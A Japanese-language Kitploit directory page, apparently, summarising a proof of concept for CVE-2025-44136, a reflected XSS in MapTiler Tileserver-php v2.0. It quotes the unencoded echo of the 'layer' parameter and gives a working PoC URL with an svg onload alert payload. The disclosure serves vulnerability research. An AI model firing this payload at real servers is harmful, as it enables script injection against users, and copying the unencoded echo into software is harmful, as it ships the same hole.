Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-44136 — MapTiler Tileserver-php v2.0における、'layer' GETパラメータを介した未認証のリフレクションXSSの概念実証エクスプロイトです。任意のHTML/JSの実行を可能にします。 | Kitploit
ツール/GitHubGitHub/mheranco/cve-2025-44136
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmheranco/cve-2025-44136

CVE-2025-44136

MapTiler Tileserver-php v2.0における、'layer' GETパラメータを介した未認証のリフレクションXSSの概念実証エクスプロイトです。任意のHTML/JSの実行を可能にします。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-44136

MapTiler Tileserver-php v2.0における認証不要のXSS

説明

MapTiler Tileserver-php v2.0はクロスサイトスクリプティング(XSS)に対して脆弱です。GETパラメータ「layer」がHTMLエンコードされずにエラーメッセージに反映されます。これによりXSSが発生し、認証されていない攻撃者が被害者のブラウザ上で任意のHTMLまたはJavaScriptコードを実行できるようになります。

https://github.com/maptiler/tileserver-php/blob/d0fdeaec69688dc500b652a23669d724d7d53df2/tileserver.php#L409

root@kitploit:~
 echo 'Server: Unknown or not specified dataset "' . $tileset . '"';

PoC

http://host/tileserver.php/wmts/x/1/1/asd?Request=x&layer=%3csvg+onload=alert(document.domain)%3e

クレジット

Martin Herancourt

ツールをダウンロード